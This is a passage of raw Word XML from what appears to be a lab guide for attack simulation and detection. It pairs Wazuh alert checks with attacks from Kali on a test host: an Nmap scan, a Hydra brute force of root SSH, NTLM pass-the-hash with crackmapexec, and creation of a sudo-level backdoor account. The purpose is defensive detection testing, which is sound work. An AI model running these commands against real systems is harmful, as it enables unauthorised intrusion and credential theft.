          </w:p>
          <w:p w14:paraId="5D2C144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lastRenderedPageBreak/>
              <w:t xml:space="preserve">  /tmp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C144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  <w:p w14:paraId="5D2C144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report_changes='yes'&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C144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/etc/sudoers.d</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C145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  <w:p w14:paraId="5D2C145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report_changes='yes'&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C145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/etc/passwd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C145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  <w:p w14:paraId="5D2C145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&lt;directories check_all='yes' report_changes='yes'&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C145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/etc/shadow</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C145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&lt;/directories&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D2C1458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59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Apply config changes</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C145A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systemctl restart wazuh-agent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D2C145C" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D2C145D" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>2.5 Samba — SMB Share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5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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C145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apt install -y samba samba-common-bin</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C1460" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
            <w:pPr>
              <w:spacing w:before="80" w:after="20"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D2C146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Add to /etc/samba/smb.conf</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C146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[labshare]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C146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path = /srv/labshare</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C146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valid users = labsmb</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C146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read only = yes</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C146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browseable = yes</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C1467" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
            <w:pPr>
              <w:spacing w:before="80" w:after="20"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D2C146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Create share and user</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C146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mkdir -p /srv/labshare</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C146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'simulation_data' | sudo tee /srv/labshare/data.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C146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useradd -M -s /usr/sbin/nologin labsmb</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C146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-e 'SmbL@bPass1\nSmbL@bPass1' | sudo smbpasswd -a -s labsmb</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C146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systemctl restart smbd nmbd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C146E" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
            <w:pPr>
              <w:spacing w:before="80" w:after="20"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D2C146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Verify SMB is listening</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C147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ss -tlnp | grep 445</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D2C1472" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51318D4C" w14:textId="77777777" w:rsidR="005D73B5" w:rsidRDefault="005D73B5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16EC0992" w14:textId="77777777" w:rsidR="005D73B5" w:rsidRDefault="005D73B5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10BA78F9" w14:textId="77777777" w:rsidR="005D73B5" w:rsidRDefault="005D73B5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D2C1473" w14:textId="7837D384" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>2.6 Kali — Offensive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7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KALI_IP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C147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apt update &amp;&amp; sudo apt install -y \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C147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crackmapexec hydra impacket-scripts \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C147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nmap smbclient enum4linux-ng responder</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C1478" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
            <w:pPr>
              <w:spacing w:before="80" w:after="20"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D2C147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Verify connectivity to target</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C147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ping -c 3 AGENT_IP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C147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nmap -p 22,445 AGENT_IP --open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D2C1482" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>2.7 SSH Backdoor Key — Kali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83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KALI_IP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C1484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ssh-keygen -t ed25519 -f ~/.ssh/lab_backdoor -C 'kali-backdoor' -N ''</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D2C148B" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C148C" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3. Phase 1 — Reconnaissance (T1046)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48D" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:pPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0C447C"/>
              </w:rPr>
              <w:t>MITRE ATT&amp;CK — T1046: Network Service Discovery</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C148E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Tactic: Discovery</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C148F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Tool: Nmap 7.99</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C1490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Target: AGENT_IP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C1491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Detection: auditd recon_tool key + Wazuh IDS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D2C1493" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D2C1494" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>3.1 Quick SMB Port Scan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95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KALI_IP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C1496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nmap -p 139,445 AGENT_IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D2C1498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9A" w14:textId="35DC991F" w:rsidR="00E3256E" w:rsidRDefault="005D73B5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5DF9448" wp14:editId="2045EE88">
                  <wp:extent cx="5935345" cy="2032000"/>
                  <wp:effectExtent l="0" t="0" r="8255" b="6350"/>
                  <wp:docPr id="79854105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9C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3.1 — Nmap: ports 139/tcp and 445/tcp open on AGENT_IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C149D" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>3.2 Full Service + OS Detection Scan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9E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KALI_IP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C149F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nmap -sV -sC -O -T4 --reason AGENT_IP -oN /tmp/lab_scan.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D2C14A1" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D2C14A6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4A7" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:pPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7B4800"/>
              </w:rPr>
              <w:t>Key Finding — SMB Signing Disabled</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C14A8" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="4A2C00"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>•  Default Samba config has message_signing: disabled</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C14A9" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="4A2C00"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>•  NTLM hash authentication accepted without cleartext credentials</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C14AA" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="4A2C00"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>•  Confirms target is viable for pass-the-hash simulation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C14AB" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="4A2C00"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>•  Fix: add 'server signing = mandatory' to /etc/samba/smb.conf</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D2C14AD" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C14AE" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>4. Phase 2 — SSH Brute Force (T1110.001)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4AF" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:pPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0C447C"/>
              </w:rPr>
              <w:t>MITRE ATT&amp;CK — T1110.001: Password Guessing</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C14B0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Tactic: Credential Access</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C14B1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Tool: Hydra v9.7 + rockyou.txt (14,344,399 passwords)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C14B2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Target: root@AGENT_IP:22</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C14B3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Detection: Rule 100101 (Level 14) — confirmed firing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D2C14B5" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D2C14B6" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>4.1 Execute Brute Force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B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KALI_IP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C14B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hydra -l root -P /usr/share/wordlists/rockyou.txt \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C14B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ssh://AGENT_IP \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C14B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-t 4 -V -f \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C14B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-o /tmp/hydra_result.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D2C14BD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BF" w14:textId="33453E8B" w:rsidR="00E3256E" w:rsidRDefault="00DE7297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0238A08" wp14:editId="027D22E2">
                  <wp:extent cx="5943600" cy="2573655"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="187557399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57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C1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4.1 — Hydra v9.7: 14,344,399 attempts against root@AGENT_IP via SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C14C2" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>4.2 Verify Detection in Wazuh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C3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4C4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tail -f /var/ossec/logs/alerts/alerts.log | grep -E '100100|100101|root'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D2C14C6" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D2C14CB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4CC" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:pPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B5E20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Detection Confirmed — Phase 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C14CD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100100 (L12): SSH brute force storm — 8+ failures from KALI_IP in 60s</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C14CE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100101 (L14): SSH brute force targeting root — fired continuously</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C14CF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MITRE: T1110.001 | PCI DSS: 10.2.4 | GDPR: IV_32.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D2C14D1" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C14D2" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>5. Phase 3 — SMB Enumeration + Pass-the-Hash (T1135, T1550.002)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4D3" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:pPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0C447C"/>
              </w:rPr>
              <w:t>MITRE ATT&amp;CK — T1135 + T1550.002</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C14D4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T1135: Network Share Discovery — enum4linux-ng full SMB audit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C14D5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T1550.002: Pass the Hash — NTLM hash computed and used for auth</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C14D6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Detection: Samba PAM events, port change rule 533, rule 100201</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D2C14D8" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D2C14D9" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>5.1 SMB Enumeration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DA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KALI_IP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C14DB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enum4linux-ng -A AGENT_IP 2&gt;&amp;1 | tee /tmp/enum_result.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D2C14DD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DF" w14:textId="56698E6A" w:rsidR="00E3256E" w:rsidRDefault="009E62B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C69189F" wp14:editId="790F2E21">
                  <wp:extent cx="5935345" cy="2395855"/>
                  <wp:effectExtent l="0" t="0" r="8255" b="4445"/>
                  <wp:docPr id="146807459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239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E1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5.1 — enum4linux-ng: SMB 445/tcp + NetBIOS 139/tcp accessible, dialects confirmed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C14E2" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>5.2 Compute NTLM Hash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E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KALI_IP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C14E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python3 -c "</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C14E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import hashlib, binascii</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C14E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password = 'SmbL@bPass1'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C14E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ntlm = hashlib.new('md4', password.encode('utf-16le')).digest()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C14E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print('NTLM hash:', binascii.hexlify(ntlm).decode())</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C14E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"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D2C14EB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ED" w14:textId="11E298C1" w:rsidR="00E3256E" w:rsidRDefault="009E62B0">
            <w:pPr>
              <w:spacing w:before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9720AA" wp14:editId="62167064">
                  <wp:extent cx="5935345" cy="3217545"/>
                  <wp:effectExtent l="0" t="0" r="8255" b="1905"/>
                  <wp:docPr id="14865738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321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4EF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5.2 — NTLM hash computed on Kali (no cleartext password transmitted)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C14F0" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>5.3 Credential Spray + Pass-the-Hash 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4F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KALI_IP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C14F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Step 1: Spray with wrong passwords (generates NTLM failure logs)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C14F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crackmapexec smb AGENT_IP -u labsmb -p badpass1 badpass2 badpass3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C14F4" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
            <w:pPr>
              <w:spacing w:before="80" w:after="20"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D2C14F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Step 2: Authenticate using NTLM hash (no cleartext password)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C14F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crackmapexec smb AGENT_IP -u labsmb -H &lt;NTLM_HASH_FROM_ABOVE&gt; --shares</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D2C14F8" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D2C14F9" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>5.4 Verify Detection in Wazuh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4FA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4FB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tail -f /var/ossec/logs/alerts/alerts.log | grep -E 'Rule|smb|samba|User|srcip'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D2C14FD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4FF" w14:textId="5C2BE059" w:rsidR="00E3256E" w:rsidRDefault="000E505F">
            <w:pPr>
              <w:spacing w:before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339B93" wp14:editId="35962590">
                  <wp:extent cx="5935345" cy="3691255"/>
                  <wp:effectExtent l="0" t="0" r="8255" b="4445"/>
                  <wp:docPr id="199118243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369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501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5.3 — alerts.log: Rule 5501 PAM session opened (labsmb via smbd), Rule 533 port change</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C1502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503" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:pPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B5E20"/>
              </w:rPr>
              <w:t>Detection Confirmed — Phase 3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C1504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5501: Samba PAM session opened for labsmb — NTLM auth accepted</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C1505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533 (L7): New port opened by smbd process</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C1506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5402: Sudo to root executed via Samba chain</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C1507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100201 (L8): NTLM auth rejection pattern in Samba logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D2C1509" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C150A" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>6. Phase 4 — User Account Creation + Password Hashing (T1136.001, T1003.008)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50B" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:pPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0C447C"/>
              </w:rPr>
              <w:t>MITRE ATT&amp;CK — T1136.001 + T1003.008</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C150C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T1136.001: Create Local Account — useradd with sudo group</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C150D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T1003.008: /etc/shadow Credential Access — hash written and staged</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C150E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Detection: auditd user_creation + passwd_change keys + FIM on shadow/passwd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D2C1510" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D2C1511" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>6.1 SSH Into Target (Simulating Lateral Movement)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512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KALI_IP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C1513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ssh labuser@AGENT_IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D2C1515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517" w14:textId="22C78FA6" w:rsidR="00E3256E" w:rsidRDefault="000E505F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D4860B8" wp14:editId="2824B1D9">
                  <wp:extent cx="5935345" cy="1583055"/>
                  <wp:effectExtent l="0" t="0" r="8255" b="0"/>
                  <wp:docPr id="12248547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158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519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6.1 — SSH login from Kali to Ubuntu as labuser confirmed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C151A" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>6.2 Create Backdoor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1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 (as labuser)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C151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Create new account with sudo access</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C151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useradd -m -s /bin/bash -G sudo svcmonitor</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C151E" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
            <w:pPr>
              <w:spacing w:before="80" w:after="20"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D2C151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Set password (writes SHA-512 or yescrypt hash to /etc/shadow)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C152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-e 'H4x0rP4ss!\nH4x0rP4ss!' | sudo passwd svcmonitor</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C1521" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
            <w:pPr>
              <w:spacing w:before="80" w:after="20"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D2C152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Add to shadow group (can read /etc/shadow)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C152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usermod -aG shadow svcmonitor</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C1524" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
            <w:pPr>
              <w:spacing w:before="80" w:after="20"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D2C152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Verify hash was written</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C152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grep 'svcmonitor' /etc/shadow | cut -d: -f1-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D2C1528" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
      <w:pPr>
